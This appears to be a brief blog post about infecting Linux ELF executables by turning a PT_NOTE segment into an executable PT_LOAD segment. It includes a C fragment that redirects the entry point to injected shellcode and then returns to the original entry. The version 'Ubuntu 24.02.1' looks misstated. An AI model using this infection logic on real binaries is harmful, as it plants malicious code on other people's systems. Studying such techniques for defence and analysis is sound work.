Recently I wrote a blog post about infecting Executable and Linkable Format files on Linux. Specifically, a method that works on the latest Ubuntu 24.02.1 by altering PT_NOTE segments to PT_LOAD segments. You can find the source code here and a proof of concept demo on Youtube below:
// Look for PT_NOTE section
for (int i = 0; i < elf_header->e_phnum; i++) {
if (program_headers[i].p_type == PT_NOTE) {
// Convert to a PT_LOAD section with values to load shellcode
printf("[+] Found PT_NOTE section\n");
printf("[+] Changing to PT_LOAD\n");
program_headers[i].p_type = PT_LOAD;
program_headers[i].p_flags = PF_R | PF_X;
program_headers[i].p_offset = file_offset;
program_headers[i].p_vaddr = memory_offset;
program_headers[i].p_memsz += sc_len;
program_headers[i].p_filesz += sc_len;
// Patch the ELF header to start at the shellcode
elf_header->e_entry = memory_offset;
printf("[+] Patched e_entry\n");
break;
}
}
// Patch shellcode to jump to the original entry point after finishing
patch(&shellcode, &shellcode_len, elf_header->e_entry, original_entry);
No comments:
Post a Comment